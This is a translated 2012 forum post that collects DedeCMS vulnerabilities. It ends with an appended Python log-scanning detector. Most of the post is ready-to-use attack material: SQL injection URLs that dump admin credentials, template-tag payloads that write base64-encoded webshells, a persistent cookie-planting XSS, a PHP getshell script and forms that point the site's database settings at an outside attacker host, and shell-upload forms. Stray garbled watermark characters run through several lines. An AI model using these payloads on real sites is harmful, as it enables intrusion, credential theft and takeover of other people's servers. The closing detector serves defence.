
DedeCMS vulnerability summary

Original poster, posted on 2012-10-18 10:42:14

Dedecms 5.6 RSS injection vulnerability

http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1


DedeCms v5.6 embedded malicious code execution vulnerability
Register a member account, upload software: in the "local address" field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After posting, viewing or editing the entry executes it.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
Generates x.php with password xiao, a one-line webshell straight away.

Dede 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

DEDECMS all versions gotopage variable XSS vulnerability
1. Copy and paste the URL below and visit it; this triggers the XSS and installs the XSS rootkit. Note that IE8/9 and the like block URL-type XSS, so the XSS filter has to be turned off.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="

2. Close the browser. No matter how you then visit any of the URLs below, our XSS is triggered.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php

DeDeCMS (Zhimeng) variable override getshell
#!/usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if($argv[2]==null){
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
    exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
// Only the status line is read back; "OK" beyond offset 12 means "HTTP/1.1 200 OK"
if (strpos($exp,"OK")>12){
    echo "\nExploit Success \n";
    if($aid==1) echo "\nShell:".$url."/$path/data/cache/fuck.php\n";
    if($aid==2) echo "\nShell:".$url."/$path/fuck.php\n";
    if($aid==3) echo "\nShell:".$url."/$path/plus/fuck.php\n";
}else{
    echo "\nExploit Failed \n";
}

// Sends one raw HTTP POST to plus/mytag_js.php; the body carries the
// _COOKIE[GLOBALS][cfg_db*] fields that override the database settings
function Getshell($url,$aid,$path){
    $id=$aid;
    $host=$url;
    $port="80";
    $content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
    $data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
    $data .= "Host: ".$host."\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
    //$data .= "Accept-Encoding: gzip,deflate\r\n";
    $data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
    $data .= "Connection: keep-alive\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Content-Length: ".strlen($content)."\r\n\r\n";
    $data .= $content."\r\n";
    $ock=fsockopen($host,$port);
    if (!$ock) {
        echo "\nNo response from ".$host."\n";
        return "";   // nothing to write to; report failure instead of crashing
    }
    fwrite($ock,$data);
    // Returns after the first response line
    while (!feof($ock)) {
        $exp=fgets($ock, 1024);
        return $exp;
    }
}
?>

DedeCms v5.6-5.7 unauthorized access vulnerability (straight into the admin backend)

http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Change validate=dcug above to the current captcha value and you get straight into the site backend.

The precondition for this vulnerability is that the backend path must already be known.

Dedecms (Zhimeng) tag remote file write vulnerability
Precondition: you must have your own dede database ready, then insert the data: insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');

Then submit with the form below and the shell is 1.php in the same directory. Work out the principle yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

Dedecms <= V5.6 Final template execution vulnerability
1. Register a user, go into the member backend, post an article and upload an image, then in attachment management replace the image with our carefully crafted template. For example the image name is:
uploads/userup/2/12OMX04-15A.jpg

The template content is (if the image format is restricted, prepend gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just posted, view the page source and construct a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />

<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>

<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>

<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)

<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>

<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)

<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>

<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)

<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>

<input type='text' name='templet' value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields' value="templet,htmltext;">(这里构造)
</div>

<!-- 表单操作区域 -->
<h3 class="meTitle">详细内容</h3>

<div class="contentShow postForm">
! L0 w% b" r" g2 x" |& K6 p" S<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />

<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>
</div>
</form>

Submit; if it reports the edit succeeded, we have changed the template path.
3. Visit the edited article:
Assuming the aid of the article just edited is 2, we only need to visit:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.

DEDECMS website management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>

Construct the form above; after upload the image is saved as /uploads/userup/3/1.gif
Post an article, then construct the edit form as follows:

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>

" h# I1 P7 ]3 S$ B- K# H) \织梦(Dedecms)V5.6 远程文件删除漏洞+ h5 F' P9 ?9 o2 y
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
+ L4 G) n) c3 z2 |: y, J
' u. c* Z& b8 x+ X' ?; \3 Q, \4 r7 e8 C! J5 y

( M! w- F& T& b
7 c9 J# q; D& `  l3 B- S2 S+ W5 [( N0 T) A7 x9 R8 k
0 l4 B% A, l5 ?, n1 ^
- S3 g0 W7 {9 G9 j# f' K, U
9 U2 v' V2 p+ p0 @6 f' s4 _
4 f2 H3 @3 w8 L+ ~2 r6 _
* \7 m" B- f; N. c1 V
Zhimeng (Dedecms) V5.6 plus/carbuyaction.php local file inclusion vulnerability

http://www.test.com/plus/carbuya ... urn&code=../../

# ~" M5 I2 _; XDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
0 |4 _3 o0 J$ U$ V. `plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
4 E: ?: B' P1 W4 J0 e; y9 n密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
5 R% ?% G: x$ u& L
- ^& h- M2 ]0 D$ P6 y. W0 y0 o2 k/ D% b. c% b
6 w' _/ u! M5 r+ J& u
4 [( K8 w$ j  R1 b$ o7 t
# F/ Q" C3 w$ f: {+ i: g
% N. g+ R/ l% o, M! g

( W" Q7 O+ t4 K7 z+ z  q
$ s% k7 F$ ~) m  y: v0 |+ ^6 c9 ~5 E+ A) v" m, J. O
7 a3 E( y6 A' }4 {" W5 V
Zhimeng (Dedecms) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

Zhimeng (Dedecms) select_soft_post.php uninitialized page variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>

Zhimeng (dedecms) 5.3 - 5.5 plus/digg_frame.php injection vulnerability
It exploits an error raised by a MySQL numeric field overflow, combined with DEDECMS writing the database error message into a PHP file whose header is not checked.
1. Visit the URL:

http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
The error message is displayed.

2. Visit
http://www.abc.com/data/mysql_error_trace.php; seeing the following output proves the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. Run the file test.html from dede.rar; note that the form action address is

<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

After pressing OK, seeing the output from step 2 indicates the file trojan was uploaded successfully.

Zhimeng (DedeCms) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
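A log-side detector for the request patterns catalogued in this post, added here as an example and not code from the original post or from DedeCMS. It assumes combined-format access logs, constructed sample lines with documentation-range IPs, and that a proxy or WAF can supply the POST body for requests such as mytag_js.php and article_edit.php whose indicators never reach the query string.

```python
"""Log-side detection for the DedeCMS request patterns catalogued in this post.

Added by the editor, not code from the original post or from DedeCMS. It scans
combined-format access log lines (constructed samples, documentation IPs) and,
where a proxy or WAF captured it, the POST body, since the view.php trigger of
the template attack looks normal and article_edit.php's templet field does not."""
import re
from urllib.parse import unquote_plus

# (rule name, regex) run over the URL-decoded request target with the decoded
# body appended, so body-only indicators such as mytag_js.php overrides show.
RULES = [
    # _COOKIE/_POST[GLOBALS][cfg_db*] configuration variable override
    ("globals_override",
     re.compile(r"(?:_COOKIE|_POST|_GET|_REQUEST)\[GLOBALS\]\[cfg_", re.I)),
    # raw SQL handed to plus/advancedsearch.php
    ("advancedsearch_raw_sql", re.compile(r"advancedsearch\.php\?.*[?&]sql=", re.I)),
    # script tag reflected through dede/login.php?gotopage=
    ("gotopage_xss", re.compile(r"login\.php\?.*gotopage=[^&]*<script", re.I)),
    # ../ in edit_face.php oldface, carbuyaction.php code, or article_edit.php templet
    ("traversal_in_file_param",
     re.compile(r"(?:oldface|code|templet)=[^&]*\.\./", re.I)),
    # error-based injection through plus/rss.php
    ("rss_updatexml_injection", re.compile(r"rss\.php\?.*updatexml\s*\(", re.I)),
    # UNION-based injection in feedback_js.php / infosearch.php
    ("union_select_injection",
     re.compile(r"(?:feedback_js|infosearch)\.php\?.*union\s+select", re.I)),
    # any direct hit on the PHP-formatted MySQL error trace file
    ("mysql_error_trace_access", re.compile(r"/data/mysql_error_trace\.php", re.I)),
]

# Combined log format: ip ident user [ts] "METHOD target proto" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def _decode(s):
    # Decode twice so a double-encoded payload still exposes its keywords.
    return unquote_plus(unquote_plus(s))

def classify(target, body=""):
    """Return the names of every rule matching a request target (+ optional body)."""
    haystack = _decode(target) + "&" + _decode(body)
    return [name for name, rx in RULES if rx.search(haystack)]

def scan_log(lines, bodies=None):
    """One finding per log line that trips a rule; bodies maps line index -> POST body."""
    bodies = bodies or {}
    findings = []
    for i, line in enumerate(lines):
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line: skip rather than guess
        hits = classify(m["target"], bodies.get(i, ""))
        if hits:
            findings.append({"ip": m["ip"], "method": m["method"],
                             "target": m["target"], "rules": hits})
    return findings

# Constructed sample log: five of the catalogued requests plus one benign hit.
SAMPLE_LOG = [
    '203.0.113.7 - - [18/Oct/2012:10:42:14 +0800] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [18/Oct/2012:10:42:20 +0800] "GET /dede/login.php?dopost=login&validate=dcug&userid=admin&pwd=x&_POST%5BGLOBALS%5D%5Bcfg_dbhost%5D=198.51.100.9 HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [18/Oct/2012:10:42:31 +0800] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3Cx=%22 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [18/Oct/2012:10:42:40 +0800] "GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 200 77 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [18/Oct/2012:10:42:52 +0800] "POST /plus/mytag_js.php?aid=1 HTTP/1.1" 200 9 "-" "Mozilla/5.0"',
    '198.51.100.20 - - [18/Oct/2012:10:43:01 +0800] "GET /plus/view.php?aid=2 HTTP/1.1" 200 6412 "-" "Mozilla/5.0"',
]
# Constructed body of the POST above, as a WAF would have captured it.
MYTAG_BODY = ("doaction=http%3A%2F%2Fexample.test%2Fplus%2Fmytag_js.php%3Faid%3D1"
              "&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=198.51.100.9&nocache=true")

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG, {4: MYTAG_BODY}):
        print(f["ip"], f["method"], ",".join(f["rules"]), f["target"][:60])
```

The plain view.php line produces no finding, which is why the mytag_js.php and article_edit.php bodies have to be fed in from a proxy or WAF rather than read from the access log alone.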